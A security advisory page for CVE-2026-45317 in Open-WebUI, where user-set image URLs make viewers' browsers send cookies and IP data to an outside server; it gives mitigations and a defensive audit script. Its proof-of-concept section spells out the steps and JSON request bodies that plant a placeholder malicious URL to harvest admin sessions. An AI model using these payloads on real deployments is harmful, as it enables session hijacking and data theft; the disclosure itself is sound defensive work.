CVE-2026-45317: Open-WebUI: CSRF image URL leaks session cookies

GHSA-j6w6-986j-2m2m MEDIUM PoC AVAILABLE CISA: TRACK*
Published May 14, 2026
CISO Take

Open-WebUI versions 0.9.2 and earlier contain an application-wide vulnerability where any authenticated user can set a malicious external URL as an image — in profile pictures, model icons, shared chats, or shared notes — causing every user who views that content to silently send a browser GET request to an attacker-controlled server, exposing session cookies, IP addresses, and browser fingerprints without any deliberate victim action. The blast radius is broad: 12 identified rendering locations are vulnerable, and a low-privileged attacker can specifically target administrators by planting a malicious profile image URL that fires when any admin visits /admin/users/overview, enabling full platform takeover via session hijacking. With 91 prior CVEs on this package and exploitation requiring only a standard user account, the CVSS 4.6 medium score underestimates the real risk in multi-user enterprise deployments where Open-WebUI serves as the shared interface to internal LLM infrastructure. Upgrade to open-webui v0.9.3 immediately; if patching is delayed, restrict the instance to trusted users, disable public chat and note sharing, and implement egress filtering to block unexpected external GET requests from the Open-WebUI host.

Sources: NVD, GitHub Advisory, ATLAS

What is the risk?

Despite a medium CVSS score of 4.6, real-world risk is elevated in multi-user Open-WebUI deployments. The attack requires only a valid user account (low privilege) and user interaction is passive — images render automatically without victims doing anything beyond visiting a page. The admin panel attack vector is especially dangerous: any user who plants a malicious profile image URL will capture admin session cookies the next time an administrator views the user list. Twelve identified attack surfaces across the application make partial mitigation unreliable without the full patch. The package's history of 91 prior CVEs signals persistent security debt in the codebase.

How does the attack unfold?

Initial Access (AML.T0049): Attacker authenticates with a low-privilege Open-WebUI user account and identifies image URL fields in profiles, models, chats, and notes as unsanitized injection points.

Weaponization (AML.T0087): Attacker registers a malicious HTTP logging server and sets profile_image_url (or model/chat/note image URLs) to point to it via direct API calls, planting the trap for future victims.

Credential Harvest (AML.T0025): Victim's browser automatically sends a GET request to the attacker's server when rendering the image during normal platform use, leaking session cookies, IP address, and user-agent without any click or interaction.

Impact (AML.T0048.003): Attacker replays the captured admin session cookie to gain full unauthorized access to the platform — model configurations, user management, API keys, and the complete conversation history of all users.

What systems are affected?

| Package | Ecosystem | Vulnerable Range | Patched |
|---|---|---|---|
| Open WebUI | pip | <= 0.9.2 | 0.9.3 |

How severe is it?

CVSS 3.1: 4.6 / 10
EPSS: 0.2% chance of exploitation in 30 days (higher than 6% of all CVEs)
Exploitation Status: Exploit Available
Exploitation: MEDIUM
Sophistication: Trivial
Exploitation Confidence: medium
CISA SSVC: Public PoC
Public PoC indexed (trickest/cve)

Composite signal derived from CISA KEV, VulnCheck KEV, CISA SSVC, EPSS, Metasploit, Exploit-DB, trickest/cve, Nuclei templates, and inthewild.io exploitation reports.

What is the attack surface?

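AV (Attack Vector): Network
AC (Attack Complexity): Low
PR (Privileges Required): Low
UI (User Interaction): Required
S (Scope): Unchanged
C (Confidentiality): Low
I (Integrity): None
A (Availability): Low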

What should I do?

  1. Patch: Upgrade open-webui to v0.9.3 or later — the fix is documented in GHSA-j6w6-986j-2m2m.

  2. Workaround (if unable to patch): Disable public chat and note sharing; restrict Open-WebUI access to trusted internal users only; implement a Content Security Policy that allowlists only internal image sources.

  3. Network control: Configure egress filtering on the Open-WebUI host to block HTTP/HTTPS GET requests from the application to unexpected external domains.

  4. Detection: Audit proxy and WAF logs for external GET requests originating from your Open-WebUI instance to non-whitelisted domains; query the database for non-local URLs in profile_image_url fields and model profile_image_url fields; alert on image URL modifications via the user or model APIs.

  5. Post-patch audit: Scan existing user profiles, model configurations, shared chats, and notes for malicious image URLs already planted before patching.
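
One way to run the database check in step 4 and the post-patch audit in step 5, as an added example that is not code from the advisory or from the Open WebUI project. The record shapes mirror the request bodies shown in the advisory; the allowlisted host, the sample hosts, and how the records are exported from your database are assumptions.

```python
from urllib.parse import urlsplit

# Assumption: the only hosts your deployment legitimately serves images from.
ALLOWED_HOSTS = {"webui.internal.example"}


def is_external(url, allowed_hosts=ALLOWED_HOSTS):
    """True if a browser rendering `url` as an image would contact a host off the allowlist."""
    if not isinstance(url, str) or not url.strip():
        return False
    # Browsers treat "\" like "/" in http(s) URLs, so "\\host\x.png" is scheme-relative.
    candidate = url.strip().replace("\\", "/")
    try:
        parts = urlsplit(candidate)
        host = (parts.hostname or "").lower()
    except ValueError:  # malformed authority, e.g. unbalanced IPv6 brackets
        return True
    if parts.scheme in ("data", "blob"):
        return False  # inline content, no request to a third party
    if not parts.scheme and not parts.netloc:
        return False  # relative path, resolved against the Open WebUI origin
    return host not in allowed_hosts


def image_urls(kind, record):
    """Yield (field, url) for each image URL location named in the advisory."""
    if kind == "user":
        yield "profile_image_url", record.get("profile_image_url")
    elif kind == "model":
        yield "meta.profile_image_url", (record.get("meta") or {}).get("profile_image_url")
    elif kind == "chat":
        history = (record.get("chat") or {}).get("history") or {}
        for msg_id, msg in (history.get("messages") or {}).items():
            for f in msg.get("files") or []:
                if f.get("type") == "image":
                    yield f"history.messages.{msg_id}.files", f.get("url")
    elif kind == "note":
        for f in (record.get("data") or {}).get("files") or []:
            if f.get("type") == "image":
                yield "data.files", f.get("url")


def audit(records, allowed_hosts=ALLOWED_HOSTS):
    """Return (kind, record_id, field, url) for every image URL pointing off the allowlist."""
    return [
        (kind, rec_id, field, url)
        for kind, rec_id, record in records
        for field, url in image_urls(kind, record)
        if is_external(url, allowed_hosts)
    ]


# Constructed sample rows (not real data): (kind, id, record as stored/exported).
SAMPLE = [
    ("user", "u1", {"profile_image_url": "/user.png"}),
    ("user", "u2", {"profile_image_url": "https://img.example.net/a.png"}),
    ("user", "u3", {"profile_image_url": "data:image/png;base64,iVBORw0KGgo="}),
    ("model", "model_test", {"meta": {"profile_image_url": "//img.example.net/m.png"}}),
    ("chat", "c1", {"chat": {"history": {"messages": {"m1": {"files": [
        {"type": "image", "url": "https://webui.internal.example/api/v1/files/1/content"}]}}}}}),
    ("note", "n1", {"data": {"files": [
        {"id": "f1", "type": "image", "url": "\\\\img.example.net\\n.png"}]}}),
]

if __name__ == "__main__":
    for finding in audit(SAMPLE):
        print(*finding, sep="\t")
```

Every finding is a record to review and reset; scheme-relative and backslash-prefixed URLs are flagged because a browser resolves them to a foreign host just like an absolute URL.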

What does CISA's SSVC say?

Decision: Track*
Exploitation: poc
Automatable: No
Technical Impact: partial

Source: CISA Vulnrichment (SSVC v2.0). Decision based on the CISA Coordinator decision tree.

Which compliance frameworks are affected?

This CVE is relevant to:

EU AI Act: Article 15 - Accuracy, robustness and cybersecurity
ISO 42001: A.6.2.5 - Measures addressing cybersecurity of AI systems
NIST AI RMF: MANAGE 2.4 - Mechanisms for detecting and responding to AI risks
OWASP LLM Top 10: LLM06 - Sensitive Information Disclosure

Frequently Asked Questions

Is CVE-2026-45317 actively exploited?

Proof-of-concept exploit code is publicly available for CVE-2026-45317, increasing the risk of exploitation.

What systems are affected by CVE-2026-45317?

This vulnerability affects the following AI/ML architecture patterns: AI model serving interfaces, Multi-user AI workspaces, Self-hosted LLM deployments.

What is the CVSS score for CVE-2026-45317?

CVE-2026-45317 has a CVSS v3.1 base score of 4.6 (MEDIUM). The EPSS exploitation probability is 0.17%.

What is the AI security impact?

Affected AI Architectures

AI model serving interfaces
Multi-user AI workspaces
Self-hosted LLM deployments

MITRE ATLAS Techniques

AML.T0025 Exfiltration via Cyber Means
AML.T0048.003 User Harm
AML.T0049 Exploit Public-Facing Application
AML.T0087 Gather Victim Identity Information

Compliance Controls Affected

EU AI Act: Article 15
ISO 42001: A.6.2.5
NIST AI RMF: MANAGE 2.4
OWASP LLM Top 10: LLM06

What are the technical details?

Original Advisory

## Summary

An application-wide Cross-Site Request Forgery (CSRF) vulnerability was found in Open-WebUI's image uploading functionality. An attacker can set an image URL to a malicious endpoint, allowing them to perform actions on behalf of a victim user. Any authenticated user can exploit this vulnerability, and any user who views the compromised image (e.g., a profile picture) will unknowingly send a GET request to the attacker-controlled URL. This can lead to cookie theft, denial of service (DoS), or other malicious actions.

This can be exploited in various locations, including:

- Profile picture
- Model picture
- Hidden images in shared chats
- Images within shared notes

## Details

### Vulnerable Code:

This appears to occur in most locations where images can be uploaded/rendered. Here are the found sinks:

**Profile Image in chat**
- Note: rendering profile picture in chat
- Location: https://github.com/open-webui/open-webui/blob/2407d9b905978d68619bdce4021e424046ec8df9/src/lib/components/chat/Messages/ProfileImage.svelte#L16

**Profile Picture edit**
- Note: Profile picture rendering in edit
- Location: https://github.com/open-webui/open-webui/blob/2407d9b905978d68619bdce4021e424046ec8df9/src/lib/components/chat/Settings/Account.svelte#L205

**Profile Image Navbar**
- Note: Profile picture rendering in navbar
- Location: https://github.com/open-webui/open-webui/blob/2407d9b905978d68619bdce4021e424046ec8df9/src/lib/components/chat/Navbar.svelte#L237

**Profile Image UserList**
- Note: rendering images in user list admin panel
- Location: https://github.com/open-webui/open-webui/blob/2407d9b905978d68619bdce4021e424046ec8df9/src/lib/components/admin/Users/UserList.svelte#L399

**Images in chat**
- Note: rendering images in chat
- Location: https://github.com/open-webui/open-webui/blob/2407d9b905978d68619bdce4021e424046ec8df9/src/lib/components/common/Image.svelte#L35

**Image in chat**
- Note: Image sent in chat
- Location: https://github.com/open-webui/open-webui/blob/2407d9b905978d68619bdce4021e424046ec8df9/src/lib/components/channel/Messages/Message.svelte#L192

**Model image in chat**
- Note: Model image rendering in chat
- Location: https://github.com/open-webui/open-webui/blob/2407d9b905978d68619bdce4021e424046ec8df9/src/lib/components/chat/Placeholder.svelte#L128

**Model image in chat response**
- Note: Model image rendering in the assistant response
- Location: https://github.com/open-webui/open-webui/blob/2407d9b905978d68619bdce4021e424046ec8df9/src/lib/components/chat/Messages/ResponseMessage.svelte#L612

**Model Image Admin settings**
- Note: Model image rendering in the admin settings
- Location: https://github.com/open-webui/open-webui/blob/2407d9b905978d68619bdce4021e424046ec8df9/src/lib/components/admin/Settings/Models.svelte#L336

**Model Image Workspace**
- Note: Model image rendering in the workspace
- Location: https://github.com/open-webui/open-webui/blob/2407d9b905978d68619bdce4021e424046ec8df9/src/lib/components/workspace/Models.svelte#L336

**Model Image Edit**
- Note: Model image rendering in the edit modal
- Location: https://github.com/open-webui/open-webui/blob/2407d9b905978d68619bdce4021e424046ec8df9/src/lib/components/workspace/Models/ModelEditor.svelte#L407

**Image in Notes**
- Note: Image rendering in shared note
- Location: https://github.com/open-webui/open-webui/blob/2407d9b905978d68619bdce4021e424046ec8df9/src/lib/components/common/RichTextInput/Image/image.ts#L140
- Location: https://github.com/open-webui/open-webui/blob/2407d9b905978d68619bdce4021e424046ec8df9/src/lib/components/chat/Messages/UserMessage.svelte#L184

**Root Cause**

1. Insecure display of image
   - Application is sending a GET request to the unvalidated image url
2. Lack of Input Validation
   - Image url is not validated for filetype

## PoCs

### PoC (profile picture)

**Environment**
- Open-WebUI latest version (v0.6.41)
- Valid user

**Step 1: Create a Malicious Link**
- Set up a server to obtain victim's cookies, ip, referer, user-agent, etc

**Step 2: Profile Image URL**
1. Add user
   1. Change the profile image url parameter to the malicious URL (server was used for PoC)
   2. Example POST request: (screenshot in the original advisory)
4. Repeat action
   1. Repeat for userSignUp, updateUserProfile, and update

**Step 3: View Image on Victim Admin Account**
1. Log into an admin account
2. Visit the admin panel (/admin/users/overview)
3. Notice the GET request sent to the malicious URL

**Step 4: Verify User Information Is Sent**
1. Confirm user information is sent

### PoC (chat)

**Environment**
- Open-WebUI latest version (v0.6.41)
- Valid user

**Step 1: Create a Malicious Link**
- Set up a server to obtain victim's cookies, ip, referer, user-agent, etc

**Step 2: Start chat**
1. Start chat
   1. Send a message
2. Resend POST request
   1. Resend post request to this endpoint /api/v1/chats/[chat_id_here]
   2. Add in a file with type set to image and the url set to the malicious link
   3. Replace models/ids/malicious_url_here with what is applicable
   4. `{"chat":{"models":["redacted"],"history":{"messages":{"id_here":{"id":"id_here","parentId":"id_here","childrenIds":["id_here"],"role":"user","content":"","files":[{"type":"image","url":"MALICIOUS_URL_HERE"}],"timestamp":1765978991,"models":["redacted"]}}},"params":{},"files":[]}}`
3. Share chat
   1. Copy link to share the chat

**Step 3: View Image on Victim Account**
1. Log into a valid account
2. Open the shared chat
3. Notice the GET request sent to the malicious URL from the hidden image on the page

**Step 4: Verify User Information Is Sent**
1. Confirm user information is sent

### PoC (notes)

**Environment**
- Open WebUI latest version (v0.6.41)
- Valid user with access to notes

**Step 1: Create a Malicious Link**
- Set up a server to obtain victim's cookies, ip, referer, user-agent, etc

**Step 2: Create Note**
1. Resend POST request to /api/v1/notes/[note_id_here]/update
2. Add in the malicious URL to a file
3. Example parameters
   1. (replace the ID_HERE with valid ID and MALICIOUS_URL_HERE with the malicious URL):
   2. `{"title":"2025-12-17","data":{"files":[{"id":"ID_HERE","type":"image","url":"MALICIOUS_URL_HERE"}]},"access_control":{"read":{"group_ids":[],"user_ids":[]},"write":{"group_ids":[],"user_ids":[]}}}`
4. Refresh page and notice the request being sent to the malicious URL
5. Share note and copy link

**Step 5: View Note on Valid Account**
1. Log into a valid account
2. Open the shared note
3. Notice the GET request sent to the malicious URL from the hidden image on the page

**Step 6: Verify User Information Is Sent**
1. Verify that user information is sent.

### PoC (model)

**Environment**
- Open WebUI latest version (v0.6.41)
- Admin user

**Step 1: Create a Malicious Link**
- Set up a server to obtain victim's cookies, ip, referer, user-agent, etc

**Step 2: Create Model**
1. Navigate to /workspace/models
2. Create or edit a model
3. Send a POST request to /api/v1/models/create or /api/v1/models/model/update?id=[model_id]
   1. Change the profile_image_url to the malicious link
   2. Example parameters:
   3. `{"id":"model_test","base_model_id":"redacted","name":"MODEL_TEST","meta":{"profile_image_url":"MALICIOUS_URL_HERE","description":null,"suggestion_prompts":null,"tags":[],"capabilities":{"vision":true,"file_upload":true,"web_search":true,"image_generation":true,"code_interpreter":true,"citations":true,"usage":false}},"params":{},"access_control":null}`

**Step 3: View Image on Valid Account**
1. Log into a valid account
2. Create chat with the model
3. Notice a GET request is sent to the malicious url
4. All users starting a chat with that model will be vulnerable to the attack

**Step 4: View Image on Admin Account**
1. Navigate to /workspace/models
2. Notice GET request sent to malicious url

**Step 5: Verify User Information Is Sent**
1. On the set up server verify that improperly set cookies are sent, IP, user-agent, etc.

### Other Attack Examples

- Alternative malicious links
  - Signout of Open WebUI
    - /api/v1/auths/signout
  - Internal network endpoints
  - Signout of other applications
  - Resource intensive endpoints
  - Etc

### Recommended Fix

- Store images
  - Instead of sending a GET request to load the image each time, store the image and render on the page
- Validate input
  - Image file types should be whitelisted (examples: .jpg, .png, .gif, .jpeg, etc)

## Impact

### Vulnerability Type

- CWE-352: Cross-Site Request Forgery (CSRF)
- CWE-20: Improper Input Validation

### Affected users

- All authenticated users

The impact of this vulnerability is significant. This application-wide vulnerability allows an attacker to perform actions on behalf of any user who views the compromised image. This can be particularly damaging if an administrator or privileged user views the image, as it could lead to elevated access or sensitive data exposure.

Exploitation Scenario

An attacker with a basic Open-WebUI account stands up a simple HTTP logging server and updates their profile_image_url to point at it via the user profile API. When an administrator next visits /admin/users/overview to review accounts, the admin's browser automatically fetches the attacker's URL to render the profile image, including the admin's session cookie in the request headers. The attacker captures the session token and replays it to authenticate as the administrator, gaining full control over all model configurations, API keys, user accounts, and the entire conversation history stored in the platform — which may contain sensitive business data, internal IP, or credentials passed to the LLM. For maximum reach, the attacker alternatively sets the malicious URL as a popular shared model's profile image, passively harvesting cookies from every user who starts a chat with that model.

Weaknesses (CWE)

CWE-20 — Improper Input Validation: The product receives input or data, but it does not validate or incorrectly validates that the input has the properties that are required to process the data safely and correctly.

  • [Architecture and Design] Consider using language-theoretic security (LangSec) techniques that characterize inputs using a formal language and build "recognizers" for that language. This effectively requires parsing to be a distinct layer that effectively enforces a boundary between raw input and internal data representations, instead of allowing parser code to be scattered throughout the program, where it could be subject to errors or inconsistencies that create weaknesses. [REF-1109] [REF-1110] [REF-1111]
  • [Architecture and Design] Use an input validation framework such as Struts or the OWASP ESAPI Validation API. Note that using a framework does not automatically address all input validation problems; be mindful of weaknesses that could arise from misusing the framework itself (CWE-1173).

Source: MITRE CWE corpus.

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:N/A:L

Timeline

Published: May 14, 2026
Last Modified: May 14, 2026
First Seen: May 15, 2026
